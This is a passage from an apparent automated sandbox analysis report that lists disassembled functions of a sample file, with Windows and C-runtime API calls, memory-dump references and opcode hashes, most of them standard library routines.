                                                                                                              • Part of subcall function 00323A4D: __CallSettingFrame@12.LIBCMT ref: 00323A99
                                                                                                              • Part of subcall function 0032778B: __getptd.LIBCMT ref: 0032779A
                                                                                                              • Part of subcall function 0032778B: __getptd.LIBCMT ref: 003277A8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                            • String ID:
                                                                                                            • API String ID: 1602911419-0
                                                                                                            • Opcode ID: 7e9a9415bb48b130ca597da9971d07d8f7f1b6ed5bc839191bc9c4e3969dfd77
                                                                                                            • Instruction ID: e1740384339ef4a33df3b68263d5786bd0f0e5ba5822bbfb136eadd582762539
                                                                                                            • Opcode Fuzzy Hash: 7e9a9415bb48b130ca597da9971d07d8f7f1b6ed5bc839191bc9c4e3969dfd77
                                                                                                            • Instruction Fuzzy Hash: 0A11D7B1C01319DFDB11EFA4E845AAEBBB1FF04310F108069F854AB291DB789A119F91
                                                                                                            Function 00328B5A Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __getptd.LIBCMT ref: 00328B66
                                                                                                              • Part of subcall function 003281BE: __getptd_noexit.LIBCMT ref: 003281C1
                                                                                                              • Part of subcall function 003281BE: __amsg_exit.LIBCMT ref: 003281CE
                                                                                                            • __amsg_exit.LIBCMT ref: 00328B86
                                                                                                            • __lock.LIBCMT ref: 00328B96
                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00328BB3
                                                                                                            • _free.LIBCMT ref: 00328BC6
                                                                                                            • InterlockedIncrement.KERNEL32(02B11790), ref: 00328BDE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3470314060-0
                                                                                                            • Opcode ID: 903be124f63c35cf5b06e1337116c2e83faede6e97decec97047ab11c24597aa
                                                                                                            • Instruction ID: 108e56523bde261bb6adba359f46f703ea523af1534bb214b61f4fb56c9ae8cd
                                                                                                            • Opcode Fuzzy Hash: 903be124f63c35cf5b06e1337116c2e83faede6e97decec97047ab11c24597aa
                                                                                                            • Instruction Fuzzy Hash: 5C019671902B31DBDB23AB68B845B5E7764BF40721F054109F8046B291CF346C81CFD2
                                                                                                            Function 003090ED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 00309164
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0030919C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003091D2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00309222
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0030928C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                                                            • String ID: d
                                                                                                            • API String ID: 971639600-2564639436
                                                                                                            • Opcode ID: b1e34ed92f43430cd3ea5f24a8b9a56030ec1da0f7b70e8892fa418246df88a8
                                                                                                            • Instruction ID: e7fcb550b9f05e5c240eb4184d3c2440c913e54564da80531ad5b16e429fd641
                                                                                                            • Opcode Fuzzy Hash: b1e34ed92f43430cd3ea5f24a8b9a56030ec1da0f7b70e8892fa418246df88a8
                                                                                                            • Instruction Fuzzy Hash: 353130316008199BFB1ECF88C6E8B6EB776FB90309F148269D0166FAD5C335E945CB51
                                                                                                            Function 00306F94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030702F
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00307073
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003070B5
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00307117
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 003071A5
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 0030723B
                                                                                                            • closesocket.WS2_32(?), ref: 00307245
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWaitclosesocketshutdown
                                                                                                            • String ID: d
                                                                                                            • API String ID: 1024630845-2564639436
                                                                                                            • Opcode ID: 0949a1fb7795e3cdf306149a63c94ea1886fcf168dc8a343921bd28c66e968b5
                                                                                                            • Instruction ID: 67e40bbced2882cbe4967d3a48b800bccd08c49e5c700af1f0bb3f515869be52
                                                                                                            • Opcode Fuzzy Hash: 0949a1fb7795e3cdf306149a63c94ea1886fcf168dc8a343921bd28c66e968b5
                                                                                                            • Instruction Fuzzy Hash: FE41EF319004248FFB3ACA68C8A5B59B776FB90305F0582E9D01E9F5D6C735AD95CF50
                                                                                                            Function 00309121 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 00309164
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0030919C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003091D2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00309222
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0030928C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                                                            • String ID: d
                                                                                                            • API String ID: 971639600-2564639436
                                                                                                            • Opcode ID: 470ba4f5440bec2cd31a803e028cf2210c1020be04eb4895f37b885b53703028
                                                                                                            • Instruction ID: 42493fd7e53e1f4271c0e92e5a18d86d0c5728cb189a1ef40db6d0f2a96d77d9
                                                                                                            • Opcode Fuzzy Hash: 470ba4f5440bec2cd31a803e028cf2210c1020be04eb4895f37b885b53703028
                                                                                                            • Instruction Fuzzy Hash: D13123316004198BFB1DCF88C6E8A6EB776FB90309F148269D0166FAD5C335A945CB51
                                                                                                            Function 00306FD7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030702F
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00307073
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003070B5
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00307117
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 003071A5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                                                            • String ID: d
                                                                                                            • API String ID: 971639600-2564639436
                                                                                                            • Opcode ID: e4681c486b0af0ee7c50fe663984b839de4367e37845f22af353016d1f8c16a8
                                                                                                            • Instruction ID: 555f069cc87d3564d76697bad08e07da601a4779f71f0b3cc2ac1d1580c15e85
                                                                                                            • Opcode Fuzzy Hash: e4681c486b0af0ee7c50fe663984b839de4367e37845f22af353016d1f8c16a8
                                                                                                            • Instruction Fuzzy Hash: DA31CE31A104248BFB39CA68C8A4B59B776FB90309F0582E9D01EAF5D6C735AD95CF50
                                                                                                            Function 003068EF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 00306932
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0030696A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00306987
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003069D7
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00306A95
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                                                            • String ID: d
                                                                                                            • API String ID: 971639600-2564639436
                                                                                                            • Opcode ID: 6fcb95f32a56dbeb76203db61afcf8e66ae977f2ef168d3fef06bf735f8c966e
                                                                                                            • Instruction ID: 65cb62ac6a172a97a41f0b38c68bff9b3e0d3e3b0a0199475021d443abaf309b
                                                                                                            • Opcode Fuzzy Hash: 6fcb95f32a56dbeb76203db61afcf8e66ae977f2ef168d3fef06bf735f8c966e
                                                                                                            • Instruction Fuzzy Hash: EB31FE31600814DBFB2ACF88C6E5A6DB776FB90309F1582ACD0166F6D5C735EA46DB40
                                                                                                            Function 0031C420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NW;;;LW),00000001,00000000,00000000), ref: 0031C456
                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0031C470
                                                                                                            • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0031C48C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031C499
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Security$Descriptor$ConvertFreeInfoLocalNamedSaclString
                                                                                                            • String ID: S:(ML;;NW;;;LW)
                                                                                                            • API String ID: 173816248-495562761
                                                                                                            • Opcode ID: d77016b7ca0313f733671987a30e75c2ecf7b72bb0ce109aa2d3edbb03f8a23c
                                                                                                            • Instruction ID: 906e9aa7f1294d7a369714bc5f4dd55fc5e16539b6c400ecbbbd326ed57109cc
                                                                                                            • Opcode Fuzzy Hash: d77016b7ca0313f733671987a30e75c2ecf7b72bb0ce109aa2d3edbb03f8a23c
                                                                                                            • Instruction Fuzzy Hash: 96011EB1A44309ABEB25CFD0CD55FEFB7BDAB48704F104548E605AA1C0D7B5AA44CFA1
                                                                                                            Function 00327A12 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ___BuildCatchObject.LIBCMT ref: 00327A25
                                                                                                              • Part of subcall function 00327980: ___BuildCatchObjectHelper.LIBCMT ref: 003279B6
                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00327A3C
                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 00327A4A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                            • String ID: csm$csm
                                                                                                            • API String ID: 2163707966-3733052814
                                                                                                            • Opcode ID: 4ef99debcadfdcecb3433f75b9a0fe794b6cec0601b21e23afb445cc8b992cdc
                                                                                                            • Instruction ID: 3e725c9cac8fc8966d4934721f33ee4944f9155b1bcd3ebd04510f62a1ede1a6
                                                                                                            • Opcode Fuzzy Hash: 4ef99debcadfdcecb3433f75b9a0fe794b6cec0601b21e23afb445cc8b992cdc
                                                                                                            • Instruction Fuzzy Hash: 8201E47100512ABBDF13AE91EC46EEE7F6AFF18354F104010FD1819262D7369AB1DBA1
                                                                                                            Function 003241F8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 00324212
                                                                                                              • Part of subcall function 00324619: __FF_MSGBANNER.LIBCMT ref: 00324632
                                                                                                              • Part of subcall function 00324619: __NMSG_WRITE.LIBCMT ref: 00324639
                                                                                                              • Part of subcall function 00324619: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00305B93,?), ref: 0032465E
                                                                                                            • std::exception::exception.LIBCMT ref: 00324247
                                                                                                            • std::exception::exception.LIBCMT ref: 00324261
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00324272
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                            • String ID: Ea1
                                                                                                            • API String ID: 615853336-2754137317
                                                                                                            • Opcode ID: 29181f46492936ad128787cc54a36485d55c54c561d358f0bcec91e9c74b7d6b
                                                                                                            • Instruction ID: 9232720259df689aeea4f97b564c163324642f853c8888e7401d0489a0933ba4
                                                                                                            • Opcode Fuzzy Hash: 29181f46492936ad128787cc54a36485d55c54c561d358f0bcec91e9c74b7d6b
                                                                                                            • Instruction Fuzzy Hash: 32F02835500339EACB17FB69FC42AAD77F9AF50714F500419F419AA191DBB09941C740
                                                                                                            Function 0031C1E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0030108E), ref: 0031C1EB
                                                                                                            • GetProcAddress.KERNEL32(0030108E,IsWow64Process), ref: 0031C204
                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 0031C220
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                            • String ID: IsWow64Process$KERNEL32.DLL
                                                                                                            • API String ID: 4190356694-1193389583
                                                                                                            • Opcode ID: ad793c1710e31685a6987901bb5cfc85f7d8743a8ff7bcdf17435e27bfb51e72
                                                                                                            • Instruction ID: 943532ada5d159c5223255ebd3791330b57f2184ee4efab766b313dba4ca4473
                                                                                                            • Opcode Fuzzy Hash: ad793c1710e31685a6987901bb5cfc85f7d8743a8ff7bcdf17435e27bfb51e72
                                                                                                            • Instruction Fuzzy Hash: 28F0A5B9D44208EBCB15EFE4D889BDDBBB8EB08311F109495E905A3240D7749688DF51
                                                                                                            Function 003273B8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __getptd.LIBCMT ref: 003273D9
                                                                                                              • Part of subcall function 003281BE: __getptd_noexit.LIBCMT ref: 003281C1
                                                                                                              • Part of subcall function 003281BE: __amsg_exit.LIBCMT ref: 003281CE
                                                                                                            • __getptd.LIBCMT ref: 003273EA
                                                                                                            • __getptd.LIBCMT ref: 003273F8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                            • String ID: MOC$RCC
                                                                                                            • API String ID: 803148776-2084237596
